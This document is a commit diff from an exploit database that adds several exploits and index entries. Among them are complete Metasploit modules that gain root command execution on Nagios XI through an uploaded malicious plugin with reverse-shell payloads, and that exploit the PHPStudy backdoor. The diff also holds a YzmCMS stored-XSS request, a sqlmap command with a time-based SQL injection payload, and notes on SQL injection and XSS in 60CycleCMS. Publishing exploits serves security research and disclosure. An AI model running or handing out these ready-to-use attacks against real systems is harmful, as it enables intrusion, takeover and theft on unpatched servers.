DB: 2020-03-11
7 changes to exploits/shellcodes Counter Strike: GO - '.bsp' Memory Control (PoC) Nagios XI - Authenticated Remote Command Execution (Metasploit) PHPStudy - Backdoor Remote Code execution (Metasploit) Sysaid 20.1.11 b26 - Remote Command Execution YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting Persian VIP Download Script 1.0 - 'active' SQL Injection
This commit is contained in:
parent
4df22c7404
commit
0a0ad49d15
8 changed files with 507 additions and 26 deletions
38
exploits/java/webapps/48188.txt
Normal file
38
exploits/java/webapps/48188.txt
Normal file
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution
|
||||
# Google Dork: intext:"Help Desk Software by SysAid <http://www.sysaid.com/>"
|
||||
# Date: 2020-03-09
|
||||
# Exploit Author: Ahmed Sherif
|
||||
# Vendor Homepage: https://www.sysaid.com/free-help-desk-software
|
||||
# Software Link: [https://www.sysaid.com/free-help-desk-software
|
||||
# Version: Sysaid v20.1.11 b26
|
||||
# Tested on: Windows Server 2016
|
||||
# CVE : None
|
||||
|
||||
GhostCat Attack
|
||||
|
||||
The default
|
||||
installation of Sysaid is enabling the exposure of AJP13 protocol which is used
|
||||
by tomcat instance, this vulnerability has been released recently on
|
||||
different blogposts
|
||||
<https://www.zdnet.com/article/ghostcat-bug-impacts-all-apache-tomcat-versions-released-in-the-last-13-years/>.
|
||||
|
||||
|
||||
*Proof-of-Concept*
|
||||
|
||||
[image: image.png]
|
||||
|
||||
The
|
||||
attacker would be able to exploit the vulnerability and read the Web.XML of
|
||||
Sysaid.
|
||||
Unauthenticated File Upload
|
||||
|
||||
It was
|
||||
found on the Sysaid application that an attacker would be able to upload files
|
||||
without authenticated by directly access the below link:
|
||||
|
||||
http://REDACTED:8080/UploadIcon.jsp?uploadChatFile=true&parent=
|
||||
|
||||
|
||||
|
||||
In the above screenshot, it shows that an attacker can execute commands
|
||||
in the system without any prior authentication to the system.
|
294
exploits/linux/remote/48191.rb
Executable file
294
exploits/linux/remote/48191.rb
Executable file
|
@ -0,0 +1,294 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Nagios XI Authenticated Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in Nagios XI before 5.6.6 in
|
||||
order to execute arbitrary commands as root.
|
||||
|
||||
The module uploads a malicious plugin to the Nagios XI server and then
|
||||
executes this plugin by issuing an HTTP GET request to download a
|
||||
system profile from the server. For all supported targets except Linux
|
||||
(cmd), the module uses a command stager to write the exploit to the
|
||||
target via the malicious plugin. This may not work if Nagios XI is
|
||||
running in a restricted Unix environment, so in that case the target
|
||||
must be set to Linux (cmd). The module then writes the payload to the
|
||||
malicious plugin while avoiding commands that may not be supported.
|
||||
|
||||
Valid credentials for a user with administrative privileges are
|
||||
required. This module was successfully tested on Nagios XI 5.6.5
|
||||
running on CentOS 7. The module may behave differently against older
|
||||
versions of Nagios XI. See the documentation for more information.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Jak Gibb', # https://github.com/jakgibb/ - Discovery and exploit
|
||||
'Erik Wynter' # @wyntererik - Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2019-15949'],
|
||||
['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] #original PHP exploit
|
||||
],
|
||||
'Payload' => { 'BadChars' => "\x00" },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Linux (x86)', {
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'linux',
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
|
||||
}
|
||||
} ],
|
||||
[ 'Linux (x64)', {
|
||||
'Arch' => ARCH_X64,
|
||||
'Platform' => 'linux',
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
|
||||
}
|
||||
} ],
|
||||
[ 'Linux (cmd)', {
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => 'unix',
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_bash'
|
||||
},
|
||||
'Payload' => {
|
||||
'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
|
||||
'BadChars' => "\""
|
||||
}
|
||||
} ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jul 29 2019',
|
||||
'DefaultOptions' => {
|
||||
'RPORT' => 80,
|
||||
'HttpClientTimeout' => 2, #This is needed to close the connection to the server following the system profile download request.
|
||||
'WfsDelay' => 10
|
||||
},
|
||||
'DefaultTarget' => 1))
|
||||
register_options [
|
||||
OptString.new('TARGETURI', [true, 'Base path to NagiosXI', '/']),
|
||||
OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
|
||||
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
|
||||
]
|
||||
|
||||
register_advanced_options [
|
||||
OptBool.new('ForceExploit', [false, 'Override check result', false])
|
||||
]
|
||||
import_target_defaults
|
||||
end
|
||||
|
||||
def check
|
||||
vprint_status("Running check")
|
||||
|
||||
#visit Nagios XI login page to obtain the nsp value required for authentication
|
||||
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php')
|
||||
|
||||
unless res
|
||||
return CheckCode::Unknown('Connection failed')
|
||||
end
|
||||
|
||||
unless res.code == 200 && res.body.include?('Nagios XI')
|
||||
return CheckCode::Safe('Target is not a Nagios XI application.')
|
||||
end
|
||||
|
||||
@nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
|
||||
|
||||
if @nsp.to_s.eql? ''
|
||||
return CheckCode::NoAccess, 'Could not retrieve nsp value, making authentication impossible.'
|
||||
end
|
||||
|
||||
#Attempt to authenticate
|
||||
@username = datastore['USERNAME']
|
||||
password = datastore['PASSWORD']
|
||||
cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
|
||||
|
||||
auth_res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, '/nagiosxi/login.php'),
|
||||
'method' => 'POST',
|
||||
'cookie' => cookie,
|
||||
'vars_post' => {
|
||||
nsp: @nsp,
|
||||
page: 'auth',
|
||||
debug: '',
|
||||
pageopt: 'login',
|
||||
username: @username,
|
||||
password: password,
|
||||
loginButton: ''
|
||||
}
|
||||
})
|
||||
|
||||
unless auth_res
|
||||
fail_with Failure::Unreachable, 'Connection failed'
|
||||
end
|
||||
|
||||
unless auth_res.code == 302 && auth_res.headers['Location'] == "index.php"
|
||||
fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
|
||||
end
|
||||
|
||||
#Check Nagios XI version - this requires a separate request because following the redirect doesn't work
|
||||
@cookie = auth_res.get_cookies.delete_suffix(';') #remove trailing semi-colon
|
||||
@cookie = @cookie.split().last #app returns 3 cookies, we need only the last one
|
||||
version_check = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, '/nagiosxi/index.php'),
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'nsp' => @nsp
|
||||
})
|
||||
|
||||
unless version_check
|
||||
fail_with Failure::Unreachable, 'Connection failed'
|
||||
end
|
||||
|
||||
unless version_check.code == 200 && version_check.body.include?('Home Dashboard')
|
||||
fail_with Failure::NoAccess, 'Authentication failed. Please provide a valid username and password.'
|
||||
end
|
||||
|
||||
@version = version_check.body.scan(/product=nagiosxi&version=(\d+\.\d+\.\d+)/).flatten.first rescue ''
|
||||
if @version.to_s.eql? ''
|
||||
return CheckCode::Detected('Could not determine Nagios XI version.')
|
||||
end
|
||||
|
||||
@version = Gem::Version.new @version
|
||||
|
||||
unless @version <= Gem::Version.new('5.6.5')
|
||||
return CheckCode::Safe("Target is Nagios XI with version #{@version}.")
|
||||
end
|
||||
|
||||
CheckCode::Appears("Target is Nagios XI with version #{@version}.")
|
||||
end
|
||||
|
||||
def check_plugin_permissions
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'nsp' => @nsp
|
||||
})
|
||||
|
||||
unless res
|
||||
fail_with Failure::Unreachable, 'Connection failed'
|
||||
end
|
||||
|
||||
unless res.code == 200 && res.body.include?('Manage Plugins')
|
||||
fail_with(Failure::NoAccess, "The user #{@username} does not have permission to edit plugins, which is required for the exploit to work.")
|
||||
end
|
||||
|
||||
@plugin_nsp = res.body.scan(/nsp_str = "([a-z0-9]+)/).flatten.first rescue ''
|
||||
if @plugin_nsp.to_s.eql? ''
|
||||
fail_with Failure::NoAccess, 'Failed to obtain the nsp value required for the exploit to work.'
|
||||
end
|
||||
|
||||
@plugin_cookie = res.get_cookies.delete_suffix(';') #remove trailing semi-colon
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
print_status("Uploading malicious 'check_ping' plugin...")
|
||||
boundary = rand_text_numeric(14)
|
||||
post_data = "-----------------------------#{boundary}\n"
|
||||
post_data << "Content-Disposition: form-data; name=\"upload\"\n\n1\n"
|
||||
post_data << "-----------------------------#{boundary}\n"
|
||||
post_data << "Content-Disposition: form-data; name=\"nsp\"\n\n"
|
||||
post_data << "#{@plugin_nsp}\n"
|
||||
post_data << "-----------------------------#{boundary}\n"
|
||||
post_data << "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n"
|
||||
post_data << "-----------------------------#{boundary}\n"
|
||||
post_data << "Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\n" #the exploit doesn't work with a random filename
|
||||
post_data << "Content-Type: text/plain\n\n"
|
||||
post_data << "#{cmd}\n"
|
||||
post_data << "-----------------------------#{boundary}--\n"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
|
||||
'method' => 'POST',
|
||||
'ctype' => "multipart/form-data; boundary=---------------------------#{boundary}", #this needs to be specified here, otherwise the default value is sent in the header
|
||||
'cookie' => @plugin_cookie,
|
||||
'data' => post_data
|
||||
})
|
||||
|
||||
unless res
|
||||
fail_with Failure::Unreachable, 'Upload failed'
|
||||
end
|
||||
|
||||
unless res.code == 200 && res.body.include?('New plugin was installed successfully')
|
||||
fail_with Failure::Unknown, 'Failed to upload plugin.'
|
||||
end
|
||||
|
||||
@plugin_installed = true
|
||||
end
|
||||
|
||||
def execute_payload #This request will timeout. It has to, for the exploit to work.
|
||||
print_status("Executing plugin...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, '/nagiosxi/includes/components/profile/profile.php'),
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'vars_get' => { cmd: 'download' }
|
||||
})
|
||||
end
|
||||
|
||||
def cleanup()
|
||||
return unless @plugin_installed
|
||||
|
||||
print_status("Deleting malicious 'check_ping' plugin...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, '/nagiosxi/admin/monitoringplugins.php'),
|
||||
'method' => 'GET',
|
||||
'cookie' => @plugin_cookie,
|
||||
'vars_get' => {
|
||||
delete: 'check_ping',
|
||||
nsp: @plugin_nsp
|
||||
}
|
||||
})
|
||||
|
||||
unless res
|
||||
print_warning("Failed to delete the malicious 'check_ping' plugin: Connection failed. Manual cleanup is required.")
|
||||
return
|
||||
end
|
||||
|
||||
unless res.code == 200 && res.body.include?('Plugin deleted')
|
||||
print_warning("Failed to delete the malicious 'check_ping' plugin. Manual cleanup is required.")
|
||||
return
|
||||
end
|
||||
|
||||
print_good("Plugin deleted.")
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless [CheckCode::Detected, CheckCode::Appears].include? check
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
if @version
|
||||
print_status("Found Nagios XI application with version #{@version}.")
|
||||
end
|
||||
|
||||
check_plugin_permissions
|
||||
vprint_status("User #{@username} has the required permissions on the target.")
|
||||
|
||||
if target.arch.first == ARCH_CMD
|
||||
execute_command(payload.encoded)
|
||||
message = "Waiting for the payload to connect back..."
|
||||
else
|
||||
execute_cmdstager(background: true)
|
||||
message = "Waiting for the plugin to request the final payload..."
|
||||
end
|
||||
print_good("Successfully uploaded plugin.")
|
||||
execute_payload
|
||||
print_status "#{message}"
|
||||
end
|
||||
end
|
3
exploits/multiple/local/48187.txt
Normal file
3
exploits/multiple/local/48187.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years.
|
||||
|
||||
Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48187.bsp
|
73
exploits/php/remote/48192.rb
Executable file
73
exploits/php/remote/48192.rb
Executable file
|
@ -0,0 +1,73 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "PHPStudy Backdoor Remote Code execution",
|
||||
'Description' => %q{
|
||||
This module can detect and exploit the backdoor of PHPStudy.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Dimensional', #POC
|
||||
'Airevan' #Metasploit Module
|
||||
],
|
||||
'Platform' => ['php'],
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['PHPStudy 2016-2018', {}]
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Sep 20 2019",
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The base path', '/'])
|
||||
])
|
||||
end
|
||||
def check
|
||||
uri = target_uri.path
|
||||
fingerprint = Rex::Text.rand_text_alpha(8)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'headers' => {
|
||||
'Accept-Encoding' => 'gzip,deflate',
|
||||
'Accept-Charset' => Rex::Text.encode_base64("echo '#{fingerprint}';")
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.to_s.include?(fingerprint)
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
def exploit
|
||||
uri = target_uri.path
|
||||
print_good("Sending shellcode")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'headers' => {
|
||||
'Accept-Encoding' => 'gzip,deflate',
|
||||
'Accept-Charset' => Rex::Text.encode_base64(payload.encoded)
|
||||
}
|
||||
})
|
||||
end
|
||||
end
|
|
@ -1,6 +1,6 @@
|
|||
# Exploit Title: 60CycleCMS 2.5.2 - 'news.php' SQL Injection
|
||||
# Exploit Title: 60CycleCMS - 'news.php' Multiple vulnerability
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-03-07
|
||||
# Date: 2020-02-10
|
||||
# Exploit Author: Unkn0wn
|
||||
# Vendor Homepage: http://davidvg.com/
|
||||
# Software Link: https://www.opensourcecms.com/60cyclecms
|
||||
|
@ -15,53 +15,49 @@ in file /common/lib.php Line 64 -73
|
|||
*
|
||||
function getCommentsLine($title)
|
||||
{
|
||||
=09$title =3D addslashes($title);
|
||||
=09$query =3D "SELECT `timestamp` FROM `comments` WHERE entry_id=3D '$title=
|
||||
'";
|
||||
=09// query MySQL server
|
||||
=09$result=3Dmysql_query($query) or die("MySQL Query fail: $query");=09
|
||||
=09$numComments =3D mysql_num_rows($result);
|
||||
=09$encTitle =3D urlencode($title);
|
||||
=09return '<a href=3D"post.php?post=3D' . $encTitle . '#comments" >' . $num=
|
||||
Comments . ' comments</a>';=09
|
||||
$title = addslashes($title);
|
||||
$query = "SELECT `timestamp` FROM `comments` WHERE entry_id= '$title'";
|
||||
// query MySQL server
|
||||
$result=mysql_query($query) or die("MySQL Query fail: $query");
|
||||
$numComments = mysql_num_rows($result);
|
||||
$encTitle = urlencode($title);
|
||||
return '<a href="post.php?post=' . $encTitle . '#comments" >' . $numComments . ' comments</a>';
|
||||
}
|
||||
lib.php line 44:
|
||||
*
|
||||
=09$query =3D "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `en=
|
||||
try_id` =3D'$title' ORDER BY `timestamp` ASC";
|
||||
$query = "SELECT `timestamp`,`author`,`text` FROM `comments` WHERE `entry_id` ='$title' ORDER BY `timestamp` ASC";
|
||||
|
||||
*
|
||||
*
|
||||
news.php line 3:
|
||||
*
|
||||
require 'common/lib.php';
|
||||
*=20
|
||||
*
|
||||
Then in line 15 return query us:
|
||||
*
|
||||
$query =3D "SELECT MAX(`timestamp`) FROM `entries
|
||||
$query = "SELECT MAX(`timestamp`) FROM `entries
|
||||
*
|
||||
|
||||
http://127.0.0.1/news.php?title=3D$postName[SQL Injection]
|
||||
http://127.0.0.1/news.php?title=$postName[SQL Injection]
|
||||
----------------------------
|
||||
Cross Site-Scripting vulnerability:
|
||||
File news.php in line: 136-138 :
|
||||
*
|
||||
$ltsu =3D $_GET["ltsu"];
|
||||
$etsu =3D $_GET["etsu"];
|
||||
$post =3D $_GET["post"];
|
||||
$ltsu = $_GET["ltsu"];
|
||||
$etsu = $_GET["etsu"];
|
||||
$post = $_GET["post"];
|
||||
*
|
||||
get payload us and printEnerty.php file in line 26-27:
|
||||
*
|
||||
<? echo '<a class=3D"navLink" href=3D"index.php?etsu=3D' . $etsu . '">Older=
|
||||
></a>';
|
||||
<? echo '<a class=3D"navLink" href=3D"index.php?ltsu=3D' . 0 . '">Oldest &g=
|
||||
t;>|</a>';=20
|
||||
<? echo '<a class="navLink" href="index.php?etsu=' . $etsu . '">Older ></a>';
|
||||
<? echo '<a class="navLink" href="index.php?ltsu=' . 0 . '">Oldest >>|</a>';
|
||||
*
|
||||
|
||||
print it for us!
|
||||
http://127.0.0.1/index.php?etsu=3D[XSS Payloads]
|
||||
http://127.0.0.1/index.php?ltsu=3D[XSS Payloads]
|
||||
http://127.0.0.1/index.php?etsu=[XSS Payloads]
|
||||
http://127.0.0.1/index.php?ltsu=[XSS Payloads]
|
||||
----------------------------------------------------------
|
||||
|
||||
# Contact : 0x9a@tuta.io
|
||||
# Visit: https://t.me/l314XK205E
|
||||
# @ 2010 - 2020
|
||||
# Underground Researcher
|
34
exploits/php/webapps/48189.txt
Normal file
34
exploits/php/webapps/48189.txt
Normal file
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting
|
||||
# Google Dork: N/A
|
||||
# Date: 2020-03-10
|
||||
# Exploit Author: En
|
||||
# Vendor Homepage: https://github.com/yzmcms/yzmcms
|
||||
# Software Link: https://github.com/yzmcms/yzmcms
|
||||
# Version: V5.5
|
||||
# Category: Web Application
|
||||
# Patched Version: unpatched
|
||||
# Tested on: Win10x64
|
||||
# Platform: PHP
|
||||
# CVE : N/A
|
||||
#Exploit Author: En_dust
|
||||
|
||||
#Description:
|
||||
#The add function defined in the Application/link/controller/link.class.php file does not filter the ‘url’ parameter, causing malicious code to be executed.
|
||||
|
||||
|
||||
#PoC:
|
||||
POST /yzmcms/link/link/add.html HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: http://127.0.0.1/yzmcms/link/link/add.html
|
||||
Content-Length: 130
|
||||
Cookie: CNZZDATA1261218610=2106045875-1559549499-%7C1569374982; PHPSESSID=fr095t87brjfc0l7d7sgj8oml4; yzmphp_adminid=45dfDWXXjGQg2Ce7Yg7oJZbld7iy8SN43sy2SKjq; yzmphp_adminname=7e49R0HXcjLHqBu5wgd9vXbD_D-Bq3Uq8TLw5UNpi8lIAw
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
name=evalWebsite&url=javascript%3Aalert(%2FXSS%2F)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1
|
37
exploits/php/webapps/48190.txt
Normal file
37
exploits/php/webapps/48190.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Persian VIP Download Script 1.0 - 'active' SQL Injection
|
||||
# Data: 2020-03-09
|
||||
# Exploit Author: S3FFR
|
||||
# Vendor HomagePage: http://download.freescript.ir/scripts/Persian-VIP-Download(FreeScript.ir).zip
|
||||
# Version: = 1.0 [Final Version]
|
||||
# Tested on: Windows,Linux
|
||||
# Google Dork: N/A
|
||||
|
||||
|
||||
=======================
|
||||
Vulnerable Page:
|
||||
|
||||
/cart_edit.php
|
||||
|
||||
=======================
|
||||
|
||||
Vulnerable Source:
|
||||
|
||||
89: mysql_query $user_p = mysql_fetch_array(mysql_query("SELECT * FROM `users` where id='$active'"));
|
||||
71: $active = $_GET['active'];
|
||||
|
||||
======================
|
||||
sqlmap:
|
||||
|
||||
sqlmap -u "http://target.com/cart_edit.php?active=1" -p active --cookie=[COOKIE] --technique=T --dbs
|
||||
=======================
|
||||
|
||||
Testing Method :
|
||||
|
||||
- time-based blind
|
||||
|
||||
Parameter: active (GET)
|
||||
Type: time-based blind
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
Payload: active=1' AND (SELECT 4169 FROM (SELECT(SLEEP(5)))wAin) AND 'zpth'='zpth
|
||||
|
||||
========================
|
|
@ -10986,6 +10986,7 @@ id,file,description,date,author,type,platform,port
|
|||
48174,exploits/windows/local/48174.txt,"Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,
|
||||
48180,exploits/windows/local/48180.cpp,"Microsoft Windows - 'WizardOpium' Local Privilege Escalation",2020-03-03,piotrflorczyk,local,windows,
|
||||
48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
|
||||
48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -18036,6 +18037,8 @@ id,file,description,date,author,type,platform,port
|
|||
48183,exploits/multiple/remote/48183.rb,"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)",2020-03-09,Metasploit,remote,multiple,
|
||||
48184,exploits/multiple/remote/48184.rb,"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
|
||||
48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
|
||||
48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
|
||||
48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -42449,3 +42452,6 @@ id,file,description,date,author,type,platform,port
|
|||
48166,exploits/php/webapps/48166.txt,"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read",2020-03-04,NgoAnhDuc,webapps,php,
|
||||
48176,exploits/multiple/webapps/48176.py,"ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution",2019-12-12,mr_me,webapps,multiple,
|
||||
48179,exploits/php/webapps/48179.txt,"Sentrifugo HRMS 3.2 - 'id' SQL Injection",2020-03-09,minhnb,webapps,php,
|
||||
48188,exploits/java/webapps/48188.txt,"Sysaid 20.1.11 b26 - Remote Command Execution",2020-03-10,"Ahmed Sherif",webapps,java,
|
||||
48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
|
||||
48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue